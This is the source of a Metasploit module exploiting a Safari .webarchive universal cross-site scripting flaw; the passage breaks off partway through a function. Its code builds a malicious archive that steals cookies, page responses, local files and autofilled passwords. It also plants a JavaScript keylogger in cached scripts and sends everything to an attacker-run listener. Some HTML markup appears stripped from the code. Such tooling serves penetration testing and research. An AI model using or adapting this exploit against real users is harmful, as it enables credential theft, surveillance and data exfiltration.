## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'open-uri' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML # [Array>] list of poisonable scripts per user-specified URLS attr_accessor :scripts_to_poison def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Safari .webarchive File Format UXSS', 'Description' => %q{ This module exploits a security context vulnerability that is inherent in Safari's .webarchive file format. The format allows you to specify both domain and content, so we can run arbitrary script in the context of any domain. This allows us to steal cookies, file URLs, and saved passwords from any website we want. On sites that link to cached javascripts, we can poison the user's browser cache and install keyloggers. }, 'License' => MSF_LICENSE, 'Author' => 'joev', 'References' => [ # none yet ], 'DisclosureDate' => 'Feb 22 2013', 'Actions' => [ [ 'WebServer' ] ], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer')) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']), OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']), OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']), OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]), OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]), OptBool.new('INSTALL_KEYLOGGERS', [true, "Attempt to poison the user's cache "+ "with a javascript keylogger.", true]), OptBool.new('STEAL_FORM_DATA', [true, "Enable form autofill stealing.", true]), OptBool.new('ENABLE_POPUPS', [false, "Enable the popup window fallback method for"+ " stealing form data.", true]) ], self.class) end def run if should_install_keyloggers? print_status("Fetching URLs to parse and look for cached assets...") self.scripts_to_poison = find_cached_scripts end print_status("Creating '#{datastore['FILENAME']}' file...") file_create(webarchive_xml) print_status("Running WebServer...") start_http end def cleanup super # clear my resource, deregister ref, stop/close the HTTP socket begin @http_service.remove_resource(collect_data_uri) @http_service.deref @http_service.stop @http_service.close @http_service = nil rescue end end # # Ensures that gzip can be used. If not, an exception is generated. The # exception is only raised if the DisableGzip advanced option has not been # set. # def use_zlib if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) fail_with(Exploit::Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end # # Handle the HTTP request and return a response. Code borrorwed from: # msf/core/exploit/http/server.rb # def start_http(opts={}) # Ensture all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] if (comm.to_s == "local") comm = ::Rex::Socket::Comm::Local else comm = nil end # Default the server host / port opts = { 'ServerHost' => datastore['SRVHOST'], 'ServerPort' => datastore['SRVPORT'], 'Comm' => comm }.update(opts) # Start a new HTTP server @http_service = Rex::ServiceManager.start( Rex::Proto::Http::Server, opts['ServerPort'].to_i, opts['ServerHost'], datastore['SSL'], { 'Msf' => framework, 'MsfExploit' => self, }, opts['Comm'], datastore['SSLCert'] ) @http_service.server_name = datastore['HTTP::server_name'] # Default the procedure of the URI to on_request_uri if one isn't # provided. uopts = { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => collect_data_uri }.update(opts['Uri'] || {}) proto = (datastore["SSL"] ? "https" : "http") print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}") if (opts['ServerHost'] == '') print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('')}:#{opts['ServerPort']}#{uopts['Path']}") end # Add path to resource @service_path = uopts['Path'] @http_service.add_resource(uopts['Path'], uopts) # As long as we have the http_service object, we will keep the ftp server alive while @http_service select(nil, nil, nil, 1) end end def on_request_uri(cli, request) begin data = if request.body.size > 0 request.body else request.qstring['data'] end data = JSON::parse(data || '') print_status "Received data: #{data}" rescue # json error, dismiss request & keep crit. server up end end ### ASSEMBLE THE WEBARCHIVE XML ### # @return [String] contents of webarchive as an XML document def webarchive_xml xml = webarchive_header urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) } xml << webarchive_footer end # @return [String] the first chunk of the webarchive file, containing the WebMainResource def webarchive_header %Q| WebMainResource WebResourceData #{Rex::Text.encode_base64(iframes_container_html)} WebResourceFrameName WebResourceMIMEType text/html WebResourceTextEncodingName UTF-8 WebResourceURL file:/// WebSubframeArchives | end # @return [String] the XML markup to insert into the webarchive for each unique # iframe (we use one frame per site we want to steal) def webarchive_iframe(url, idx) %Q| WebMainResource WebResourceData #{Rex::Text.encode_base64(iframe_content_for_url(url))} WebResourceFrameName <!--framePath //<!--frame#{idx}-->--> WebResourceMIMEType text/html WebResourceTextEncodingName UTF-8 WebResourceURL #{escape_xml url} #{webarchive_iframe_subresources(url, idx)} | end # @return [String] the XML mark up for adding a set of "stored" resources at # the given URLs def webarchive_iframe_subresources(url, idx) %Q| WebSubresources #{webarchive_resources_for_poisoning_cache(url)} | end # @return [String] the XML markup to insert into the webarchive for each unique # iframe (we use one frame per site we want to steal) # @return '' if msf user does not want to poison cache def webarchive_resources_for_poisoning_cache(url) if not should_install_keyloggers? then return '' end url_idx = urls.index(url) scripts = scripts_to_poison[url_idx] || [] xml_dicts = scripts.map do |script| script_body = inject_js_keylogger(script[:body]) puts %Q| WebResourceData #{Rex::Text.encode_base64(script_body)} WebResourceMIMEType application/javascript WebResourceResponse #{Rex::Text.encode_base64 web_response_xml(script)} WebResourceURL #{escape_xml script[:url]} | end xml_dicts.join end # @return [String] the closing chunk of the webarchive XML code def webarchive_footer %Q| | end # @param [script] hash containing HTTP headers from the request # @return [String] xml markup for serialized WebResourceResponse containing good # stuff like HTTP/caching headers. Safari appears to do the following: # NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data]; # [a encodeObject:response forKey:@"WebResourceResponse"]; def web_response_xml(script) # this is a binary plist, but im too lazy to write a real encoder. # ripped this straight out of a safari webarchive save. script['content-length'] = script[:body].length whitelist = %w(content-type content-length date etag Last-Modified cache-control expires) headers = script.clone.delete_if { |k, v| not whitelist.include? k } key_set = headers.keys.sort val_set = key_set.map { |k| headers[k] } key_refs = key_set.each_with_index.map do |k, i| { 'CF$UID' => 9+i } end val_refs = key_set.each_with_index.map do |k, i| { 'CF$UID' => 9+key_set.length+i } end %Q| $archiver NSKeyedArchiver $objects $null $0 8 $1 1 $10 8 $11 0 $2 7 $3 CF$UID 2 |+ (4..7).map do |i| %Q| $#{i} CF$UID #{i+1} | end.join("\n") + %Q| $8 CF$UID #{8+key_set.length*2+2} $9 CF$UID 0 $class CF$UID #{8+key_set.length*2+3} $class CF$UID 4 NS.base CF$UID 0 NS.relative CF$UID 3 #{escape_xml script[:url]} $classes NSURL NSObject $classname NSURL 388430153.25252098 1 200 $class CF$UID #{8+key_set.length*2+1} NS.keys |+ key_set.each_with_index.map do |k, i| %Q| CF$UID #{9+i} | end.join("\n") + %Q| NS.objects |+ val_set.each_with_index.map do |k, i| %Q| CF$UID #{9+key_set.length+i} | end.join("\n") + %Q| #{key_set.map{|s| "#{s}" }.join("\n")} #{val_set.map{|s| "#{s}" }.join("\n")} $classes NSMutableDictionary NSDictionary NSObject $classname NSMutableDictionary 107961 $classes NSHTTPURLResponse NSURLResponse NSObject $classname NSHTTPURLResponse $top WebResourceResponse CF$UID 1 $version 100000 | end #### JS/HTML CODE #### # Wraps the result of the block in an HTML5 document and body def wrap_with_doc(&blk) %Q| #{yield} | end # Wraps the result of the block with " end # @return [String] mark up for embedding the iframes for each URL in a place that is # invisible to the user def iframes_container_html hidden_style = "position:fixed; left:-600px; top:-600px;" wrap_with_doc do frames = urls.map { |url| "" } communication_js + frames.join + injected_js_helpers + steal_files + message end end # @return [String] javascript code, wrapped in script tags, that is inserted into the # WebMainResource (parent) frame so that child frames can communicate "up" to the parent # and send data out to the listener def communication_js wrap_with_script do %Q| window.addEventListener('message', function(event){ var x = new XMLHttpRequest; x.open('POST', '#{backend_url}#{collect_data_uri}', true); x.send(event.data); }); | end end # @return [String] all the HTML markup required for executing the chosen attacks def iframe_content_for_url(url) # this JS code runs inside the iframes, in the context of url html = '' html << injected_js_helpers html << trigger_cache_poison_for_url(url) if should_install_keyloggers? html << steal_cookies_for_url(url) if should_steal_cookies? html << steal_form_data_for_url(url) if should_steal_form? wrap_with_doc { html } end # @return [String] javascript code, wrapped in a script tag, that steals the cookies # and response body/headers, and passes them back up to the parent. def steal_cookies_for_url(url) wrap_with_script do %Q| try { var req = new XMLHttpRequest(); var sent = false; req.open('GET', '#{url}', true); req.onreadystatechange = function() { if (!sent) { sendData('response_headers', req.getAllResponseHeaders()); sendData('response_body', req.responseText); sent = true; } }; req.send(null); } catch (e) {} sendData('cookie', document.cookie); | end end # @return [String] javascript code, wrapped in a script tag, that steals local files # and sends them back to the listener. This code is executed in the WebMainResource (parent) # frame, which runs in the file:// protocol def steal_files return '' unless should_steal_files? urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ') wrap_with_script do %Q| var filesStr = "#{urls_str}"; var files = filesStr.trim().split(/\s+/); var stealFile = function(url) { var req = new XMLHttpRequest(); var sent = false; req.open('GET', url, true); req.onreadystatechange = function() { if (!sent && req.responseText && req.responseText.length > 0) { sendData(url, req.responseText); sent = true; } }; req.send(null); }; for (var i = 0; i < files.length; i++) stealFile(files[i]); | end end # @return [String] javascript code, wrapped in a script tag, that steals autosaved form # usernames and passwords. The attack first tries to render the target URL in an iframe, # and steal populated passwords from there. If the site disables iframes through the # X-Frame-Options header, we try popping open a new window and rendering the site in that. def steal_form_data_for_url(url) wrap_with_script do %Q| var stealFormData = function(win, completeFn) { var doc = win.document; if (!doc) doc = win.contentDocument; return function() { var data = {}, found = false; try { var inputs = doc.querySelectorAll( 'input[type=email],input[type=text],input[type=password],textarea' ); for (var i = 0; i < inputs.length; i++) { if (inputs[i].value && inputs[i].value.length > 0) { found = true; data[inputs[i].name] = inputs[i].value; } } if (found) sendData(data); if (completeFn) completeFn.call(); } catch(e) {} } } var tryInNewWin = function() { var y = window.open('#{url}', '_blank', 'height=0;width=0;location=0;left=200;'); if (y) { var int1 = window.setInterval(function(){y.blur();window.top.focus();}, 20); y.addEventListener('load', function() { window.setTimeout(stealFormData(y, function(){ if (int1) { window.clearInterval(int1); int1 = null; } y.close(); }), 500); }, false); } }; var tryInIframe = function(){ var i = document.createElement('iframe'); i.style = 'position:absolute;width:2px;height:2px;left:-2000px;top:-2000px;'; document.body.appendChild(i); i.src = '#{url}'; i.addEventListener('load', function() { window.setTimeout(stealFormData(i), 500); }, false); return i; }; var iframe = tryInIframe(); if (#{should_pop_up?}) { window.setTimeout(function(){ if (iframe.contentDocument && iframe.contentDocument.location.href == 'about:blank') { tryInNewWin(); } }, 1000) } | end end # @return [String] javascript code, wrapped in script tag, that adds a helper function # called "sendData()" that passes the arguments up to the parent frame, where it is # sent out to the listener def injected_js_helpers wrap_with_script do %Q| window.sendData = function(key, val) { var data = {}; if (key && val) data[key] = val; if (!val) data = key; window.top.postMessage(JSON.stringify(data), "*") }; | end end # @return [String] HTML markup that includes a script at the URL we want to poison # We will then install the injected_js_keylogger at the same URL def trigger_cache_poison_for_url(url) url_idx = urls.index(url) scripts_to_poison[url_idx].map { |s| "\n\n" }.join end # @param [String] original_js the original contents of the script file # @return [String] the poisoned contents. Once the module has found a valid 304'd script to # poison, it "poisons" it by adding a keylogger, then adds the output as a resource with # appropriate Cache-Control to the webarchive. # @return [String] the original contents if msf user does not want to install keyloggers def inject_js_keylogger(original_js) if not should_install_keyloggers? original_js else frame_name = 'lalala___lalala' secret = '____INSTALLED!??!' %Q| (function(){ if (window['#{secret}']) return; window['#{secret}'] = true; document.addEventListener('DOMContentLoaded',function(){ var buffer = ''; var sendData = function(keystrokes, time) { var img = new Image(); data = JSON.stringify({keystrokes: keystrokes, time: time}); img.src = '#{backend_url}#{collect_data_uri}?data='+data; } document.addEventListener('keydown', function(e) { var c = String.fromCharCode(e.keyCode); if (c.length > 0) buffer += c; }, true); window.setInterval(function(){ if (buffer.length > 0) { sendData(buffer, new Date); buffer = ''; } }, 3000) }); })(); #{original_js} | end end # @return [Array>] list of URLs provided by the user mapped to all of the linked # javascript assets in its HTML response. def all_script_urls(pages) pages.map do |url| results = [] print_status "Fetching URL #{url}..." # fetch and parse the HTML document doc = Nokogiri::HTML(open(url)) # recursively add scripts from iframes doc.css('iframe').each do |iframe| print_status "Checking iframe..." if not iframe.attributes['src'].nil? and not iframe.attributes['src'].value.empty? results += all_script_urls([iframe.attributes['src'].value]) end end # add all scripts on the current page doc.css('script').each do |script| # loop over every